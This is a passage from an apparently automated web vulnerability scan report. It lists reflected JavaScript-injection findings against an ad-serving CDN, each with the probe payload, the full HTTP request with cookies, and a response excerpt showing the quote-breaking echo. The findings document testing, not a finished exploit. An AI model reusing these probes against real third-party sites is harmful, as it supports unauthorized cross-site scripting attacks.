<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985a25ba';fe48c25a940%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.211. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f04ab'%3b12625b2384 was submitted in the REST URL parameter 9. This input was echoed as f04ab';12625b2384 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0f04ab'%3b12625b2384/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
CRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0f04ab';12625b2384%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.212. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e63'%3bd4fe3ee258f was submitted in the REST URL parameter 10. This input was echoed as 46e63';d4fe3ee258f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//0/20346e63'%3bd4fe3ee258f/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2591995
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:48 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=0;n=20346e63';d4fe3ee258f;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.213. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ba7'%3bd9c36cdc5fd was submitted in the REST URL parameter 11. This input was echoed as 83ba7';d9c36cdc5fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/954283ba7'%3bd9c36cdc5fd//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:52 GMT
Date: Sat, 26 Feb 2011 01:49:52 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=0;n=203;s=954283ba7';d9c36cdc5fd;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.214. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 864ff'%3bc2f0de444d5 was submitted in the REST URL parameter 4. This input was echoed as 864ff';c2f0de444d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105864ff'%3bc2f0de444d5/0/0/203687990/203687990//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:32 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105864ff';c2f0de444d5;c=203687990,203687990;i=0;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.215. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c00dc'%3bc26396354fa was submitted in the REST URL parameter 7. This input was echoed as c00dc';c26396354fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990c00dc'%3bc26396354fa/203687990//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1729
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:39 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '203687990c00dc';c26396354fa';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.216. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eb6c'%3b5079f91ec4f was submitted in the REST URL parameter 8. This input was echoed as 6eb6c';5079f91ec4f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/2036879906eb6c'%3b5079f91ec4f//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:43 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,2036879906eb6c';5079f91ec4f;i=0;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.217. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76eb8'%3b154269bab02 was submitted in the REST URL parameter 9. This input was echoed as 76eb8';154269bab02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//076eb8'%3b154269bab02/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=076eb8';154269bab02;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.218. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e74'%3b34f7324748b was submitted in the REST URL parameter 10. This input was echoed as 44e74';34f7324748b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0/20344e74'%3b34f7324748b/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=20344e74';34f7324748b%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.219. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a862'%3bf3353a7f709 was submitted in the REST URL parameter 11. This input was echoed as 3a862';f3353a7f709 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/95423a862'%3bf3353a7f709//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591963
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:54 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=95423a862';f3353a7f709%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.220. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cb8a'%3b33ba26914f6 was submitted in the REST URL parameter 4. This input was echoed as 3cb8a';33ba26914f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/23053cb8a'%3b33ba26914f6/0/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591963
Expires: Mon, 28 Mar 2011 01:48:54 GMT
Date: Sat, 26 Feb 2011 01:49:31 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
